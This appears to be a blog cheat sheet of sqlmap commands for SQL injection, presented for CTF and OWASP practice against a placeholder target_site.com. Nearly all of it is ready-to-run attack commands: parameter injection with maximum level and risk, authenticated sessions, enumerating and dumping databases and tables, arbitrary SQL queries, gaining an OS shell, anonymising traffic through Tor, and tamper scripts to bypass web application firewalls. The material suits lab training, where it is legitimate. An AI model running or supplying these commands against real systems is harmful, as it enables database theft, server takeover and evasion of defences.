Testing SQLi with SQLMAP

SQLMAP is good tool and we will have us a cheatsheet to use sqlmap in CTF and OWSP .

Basic

If nothing is known about the target yet we use the normal command first to see if SQLMap finds something nice to look at.

1
2
sqlmap -u “https://target_site.com/page/”--proxy="http://127.0.0.1:8080/" --cookie=”SESSID=lred0jr6na1vmci;” --data=”p1=value1” -p p1 --level=5 --risk=3 --dbms=mysql --technique=BEUSTQ --force-ssl

Automatic GET request parameter

1
sqlmap -u “https://target_site.com/page?p1=value1&p2=value2”

Specify the GET request parameters to Exploit

1
sqlmap -u “https://target_site.com/page?p1=value1&p2=value2” -p p1

Use POST requests (Test All parameters)

1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"

SQLMap Request file as input

1
sqlmap -r request.txt
1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"

Use Authenticated Session with Auth Headers

1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"

Basic Authentication

1
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password

Use Previously created Session as SQLmap input (-s)

1
sqlmap -u “https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs

Post Exploitation Commands

List the Databases

1
sqlmap -u “https://target_site.com/page?p1=value1” --dbs

List Tables of Database TARGET_DB

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables

List Columns of Table TARGET_TABLE of Database TARGET_DB

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns

Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump

Fully Dump Table TARGET_TABLE of Database TARGET_DB

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump

Dump full Database

1
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump

Custom SQL query

1
sqlmap -u “https://target_site.com/page?p1=value1” --sql-query "SELECT * FROM TARGET_DB;"

Get OS Shell

1
sqlmap -u “https://target_site.com/page?p1=value1” --os-shell

SQLMap Proxy

Proxy through Burpsuite

1
sqlmap -u “https://target_site.com/page?p1=value1” --proxy="http://127.0.0.1:8080/"

Use Tor Socks5 proxy

1
sqlmap -u “https://target_site.com/page?p1=value1” --tor --tor-type=SOCKS5 --check-tor --dbs

Tamper Scripts

You can use the tamper scripts to bypass WAF or to modify the payload. You can use multiple tampering scripts at once using –tamper flag.

1
sqlmap -u “https://target_site.com/page?p1=value1” --tamper=charencode
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
Page View
⬆︎TOP